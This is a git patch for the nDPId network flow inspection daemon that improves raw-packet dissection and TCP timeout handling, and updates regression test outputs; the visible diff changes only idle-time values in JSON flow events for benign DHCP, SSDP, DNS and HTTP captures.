From 22a8d04c748ff3e04ca11c5c29b4433c7136f5f5 Mon Sep 17 00:00:00 2001 From: lns Date: Sun, 24 Apr 2022 15:42:28 +0200 Subject: Added proper DLT_RAW dissection for IPv4 and IPv6. * nDPId: Improved TCP timeout handling when FIN/RST is seen, which previously caused midstream TCP flows when there shouldn't be any. * nDPIsrvd: Unified remote descriptor resource cleanup on disconnects/shutdown. * nDPIsrvd: Added additional error messages for remote descriptors. * py-flow-info: Better daemon status message printing. 
Signed-off-by: lns --- test/results/1kxun.pcap.out | 366 +- test/results/443-chrome.pcap.out | 8 +- test/results/443-curl.pcap.out | 16 +- test/results/443-firefox.pcap.out | 16 +- test/results/443-git.pcap.out | 16 +- test/results/443-opvn.pcap.out | 12 +- test/results/443-safari.pcap.out | 16 +- test/results/BGP_Cisco_hdlc_slarp.pcap.out | 12 +- test/results/BGP_redist.pcap.out | 8 +- test/results/EAQ.pcap.out | 24 +- test/results/IEC104.pcap.out | 24 +- test/results/KakaoTalk_chat.pcap.out | 242 +- test/results/KakaoTalk_talk.pcap.out | 166 +- test/results/Oscar.pcap.out | 14 +- test/results/WebattackRCE.pcap.out | 6376 ++++---- test/results/WebattackSQLinj.pcap.out | 108 +- test/results/WebattackXSS.pcap.out | 7934 ++++----- test/results/afp.pcap.out | 12 +- test/results/aimini-http.pcap.out | 48 +- test/results/ajp.pcap.out | 24 +- test/results/alexa-app.pcapng.out | 1668 +- test/results/amqp.pcap.out | 36 +- test/results/android.pcap.out | 368 +- test/results/anyconnect-vpn.pcap.out | 278 +- test/results/anydesk-2.pcap.out | 28 +- test/results/anydesk.pcap.out | 28 +- test/results/bitcoin.pcap.out | 72 +- test/results/bittorrent.pcap.out | 262 +- test/results/bjnp.pcap.out | 82 +- test/results/bot.pcap.out | 12 +- test/results/cassandra.pcap.out | 24 +- test/results/check_mk_new.pcap.out | 12 +- test/results/chrome.pcap.out | 84 +- test/results/citrix.pcap.out | 12 +- test/results/coap_mqtt.pcap.out | 48 +- test/results/corba.pcap.out | 36 +- test/results/diameter.pcap.out | 12 +- test/results/discord.pcap.out | 16 +- test/results/dnp3.pcap.out | 96 +- test/results/dns_doh.pcap.out | 14 +- test/results/dns_dot.pcap.out | 14 +- test/results/dns_fragmented.pcap.out | 28 +- test/results/dnscrypt-v2-doh.pcap.out | 480 +- test/results/drda_db2.pcap.out | 12 +- test/results/encrypted_sni.pcap.out | 24 +- test/results/ethereum.pcap.out | 664 +- test/results/ethernetIP.pcap.out | 48 +- test/results/exe_download.pcap.out | 14 +- 
test/results/exe_download_as_png.pcap.out | 14 +- test/results/facebook.pcap.out | 30 +- test/results/firefox.pcap.out | 84 +- test/results/fix.pcap.out | 144 +- test/results/fix2.pcap.out | 24 +- test/results/forticlient.pcap.out | 80 +- test/results/ftp-start-tls.pcap.out | 12 +- test/results/ftp.pcap.out | 36 +- test/results/ftp_failed.pcap.out | 12 +- test/results/fuzz-2006-06-26-2594.pcap.out | 170 +- test/results/fuzz-2006-09-29-28586.pcap.out | 342 +- test/results/git.pcap.out | 12 +- test/results/gnutella.pcap.out | 1638 +- test/results/google_ssl.pcap.out | 12 +- test/results/googledns_android10.pcap.out | 100 +- test/results/h323-overflow.pcap.out | 8 +- test/results/h323.pcap.out | 10 +- test/results/hpvirtgrp.pcap.out | 108 +- .../http-crash-content-disposition.pcap.out | 46 +- test/results/http-lines-split.pcap.out | 12 +- test/results/http-manipulated.pcap.out | 24 +- test/results/http_auth.pcap.out | 12 +- test/results/http_connect.pcap.out | 26 +- test/results/http_ipv6.pcap.out | 166 +- test/results/iec60780-5-104.pcap.out | 72 +- test/results/imap-starttls.pcap.out | 12 +- test/results/imap.pcap.out | 12 +- test/results/imaps.pcap.out | 16 +- test/results/instagram.pcap.out | 392 +- test/results/ip_fragmented_garbage.pcap.out | 232 +- test/results/iphone.pcap.out | 222 +- test/results/ipp.pcap.out | 36 +- test/results/irc.pcap.out | 12 +- test/results/jabber.pcap.out | 12 +- test/results/kerberos-login.pcap.out | 14 +- test/results/kerberos.pcap.out | 378 +- test/results/kerberos_fuzz.pcapng.out | 8 +- test/results/lisp_registration.pcap.out | 24 +- test/results/log4j-webapp-exploit.pcap.out | 86 +- test/results/long_tls_certificate.pcap.out | 16 +- test/results/malware.pcap.out | 34 +- test/results/memcached.cap.out | 12 +- test/results/modbus.pcap.out | 12 +- test/results/monero.pcap.out | 24 +- test/results/mongodb.pcap.out | 60 +- test/results/mpeg.pcap.out | 14 +- test/results/mqtt.pcap.out | 20 +- test/results/mssql_tds.pcap.out | 110 +- 
test/results/mysql-8.pcap.out | 12 +- test/results/nats.pcap.out | 24 +- ...ndpi_match_string_subprotocol__error.pcapng.out | 12 +- test/results/nest_log_sink.pcap.out | 158 +- test/results/netbios.pcap.out | 10 +- test/results/netflix.pcap.out | 638 +- test/results/nintendo.pcap.out | 56 +- test/results/nntp.pcap.out | 12 +- test/results/no_sni.pcap.out | 110 +- test/results/ocs.pcap.out | 2019 +-- test/results/ocsp.pcapng.out | 120 +- test/results/ookla.pcap.out | 24 +- test/results/openvpn.pcap.out | 12 +- test/results/oracle12.pcapng.out | 12 +- test/results/pgsql.pcap.out | 24 +- test/results/pinterest.pcap.out | 476 +- test/results/pluralsight.pcap.out | 92 +- test/results/pop3.pcap.out | 12 +- test/results/pops.pcapng.out | 12 +- test/results/pps.pcap.out | 658 +- test/results/pptp.pcap.out | 12 +- test/results/punycode-idn.pcap.out | 12 +- .../quic-mvfst-22_decryption_error.pcap.out | 734 +- test/results/quickplay.pcap.out | 236 +- test/results/rdp.pcap.out | 12 +- test/results/reasm_crash_anon.pcapng.out | 12 +- test/results/reddit.pcap.out | 888 +- test/results/rsync.pcap.out | 12 +- test/results/rtmp.pcap.out | 12 +- test/results/rtsp.pcap.out | 84 +- test/results/rtsp_setup_http.pcapng.out | 8 +- test/results/s7comm.pcap.out | 12 +- test/results/safari.pcap.out | 102 +- test/results/salesforce.pcap.out | 16 +- test/results/sccp_hw_conf_register.pcapng.out | 12 +- test/results/selfsigned.pcap.out | 14 +- test/results/signal.pcap.out | 224 +- test/results/simple-dnscrypt.pcap.out | 64 +- test/results/sites.pcapng.out | 620 +- test/results/skype.pcap.out | 1168 +- test/results/skype_no_unknown.pcap.out | 912 +- test/results/smb_deletefile.pcap.out | 12 +- test/results/smbv1.pcap.out | 12 +- test/results/smpp_in_general.pcap.out | 12 +- test/results/smtp-starttls.pcap.out | 12 +- test/results/smtp.pcap.out | 12 +- test/results/smtps.pcapng.out | 12 +- test/results/snapchat.pcap.out | 42 +- test/results/socks-http-example.pcap.out | 36 +- 
test/results/ssh.pcap.out | 20 +- test/results/ssl-cert-name-mismatch.pcap.out | 16 +- test/results/starcraft_battle.pcap.out | 442 +- test/results/synscan.pcap.out | 15974 +++++++++---------- test/results/teams.pcap.out | 560 +- test/results/teamviewer.pcap.out | 12 +- test/results/telnet.pcap.out | 18 +- test/results/tinc.pcap.out | 24 +- test/results/tls-esni-fuzzed.pcap.out | 24 +- test/results/tls-rdn-extract.pcap.out | 16 +- test/results/tls_alert.pcap.out | 12 +- test/results/tls_certificate_too_long.pcap.out | 214 +- test/results/tls_cipher_lens.pcap.out | 40 +- test/results/tls_esni_sni_both.pcap.out | 28 +- test/results/tls_invalid_reads.pcap.out | 22 +- test/results/tls_long_cert.pcap.out | 16 +- test/results/tls_port_80.pcapng.out | 14 +- test/results/tls_torrent.pcapng.out | 16 +- test/results/tls_verylong_certificate.pcap.out | 16 +- test/results/tor.pcap.out | 106 +- test/results/trickbot.pcap.out | 14 +- test/results/tumblr.pcap.out | 538 +- test/results/viber.pcap.out | 140 +- test/results/vnc.pcap.out | 24 +- test/results/wa_video.pcap.out | 14 +- test/results/wa_voice.pcap.out | 76 +- test/results/waze.pcap.out | 442 +- test/results/webex.pcap.out | 736 +- test/results/websocket.pcap.out | 12 +- test/results/wechat.pcap.out | 810 +- test/results/weibo.pcap.out | 316 +- test/results/whatsapp_login_call.pcap.out | 330 +- test/results/whatsapp_login_chat.pcap.out | 38 +- test/results/whatsapp_voice_and_message.pcap.out | 60 +- test/results/whatsappfiles.pcap.out | 30 +- test/results/whois.pcapng.out | 38 +- test/results/wow.pcap.out | 60 +- test/results/youtubeupload.pcap.out | 16 +- test/results/z3950.pcapng.out | 24 +- test/results/zabbix.pcap.out | 12 +- test/results/zattoo.pcap.out | 26 +- test/results/zcash.pcap.out | 12 +- test/results/zoom.pcap.out | 198 +- test/results/zoom2.pcap.out | 16 +- 189 files changed, 26884 insertions(+), 29363 deletions(-) (limited to 'test') 
diff --git a/test/results/1kxun.pcap.out b/test/results/1kxun.pcap.out index 6484c4b19..777fcb4c5 100644 --- a/test/results/1kxun.pcap.out +++ b/test/results/1kxun.pcap.out 
@@ -13,8 +13,8 @@ 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1470104373741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104373741,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNKS5AgEGAMCRIFIAAIAAwKgFJMCoBSTAqHcBAAAAAAAmWsJjVQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQEKgioX8MMe8wtdP8AAAAA"} 
00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104375419,"flow_last_seen":1470104375419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104375419,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1470104375419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104375419,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ZDJAAEAGzmrAqAUQROn9hdFlAFAG4xw3xV6fSoAREAEocwAAAQEIChoPAavPGvHS"} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104375419,"flow_last_seen":1470104375419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104375419,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1470104375419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104375419,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ZDJAAEAGzmrAqAUQROn9hdFlAFAG4xw3xV6fSoAREAEocwAAAQEIChoPAavPGvHS"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1470104376017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104376017,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRIAAAQRv2HAqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
@@ -49,11 +49,11 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1470104377734,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1470104377734,"pkt":"TF4M6gNlABxCjnAxCABFAABCUcIAAIARpSjAqHMICAgICMdQADUALoWI\/SwBAAABAAAAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAE="} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1470104377753,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1470104377753,"pkt":"ABxCjnAxTF4M6gNlCABFAABinjgAAC4RqpIICAgIwKhzCAA1x1AATmX5\/SyBgAABAAIAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAHADAABAAEAAAErAARquSNuwAwAAQABAAABKwAEarkjcA=="} 00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104377753,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.185.35.110"}} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377754,"flow_last_seen":1470104377754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104377754,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1470104377754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1470104377754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1470104377810,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377810,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwb1z6xq8PVhRYYASchBbqgAAAgQFtAEBBAIBAwMH"} 
-00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104377754,"flow_last_seen":1470104377818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1470104377818,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377698","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377754,"flow_last_seen":1470104377754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104377754,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1470104377754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1470104377754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1470104377810,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377810,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwb1z6xq8PVhRYYASchBbqgAAAgQFtAEBBAIBAwMH"} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104377754,"flow_last_seen":1470104377818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1470104377818,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377698","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1470104377820,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1470104377820,"pkt":"AQBeAAD8ABxCjnAxCABFAAAyUccAAAERU0fAqHMI4AAA\/MkCFOsAHtPcYF4AAAABAAAAAAAABHdwYWQAAAEAAQ=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1470104377839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104377839,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiQQLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACAGQ="} 
00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1470104377839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104377839,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNAJhAgEGADFjB6UAAAAAwKgFCcCoBQnAqHcBAAAAAHDxofgq\/QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQE\/wAAAAAAAAAAAAAAAAAA"} 
@@ -61,9 +61,9 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1470104377901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104377901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcgAAIARpSbAqHMICAgICM3zADUAKlE0ceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377901,"flow_last_seen":1470104377901,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104377901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 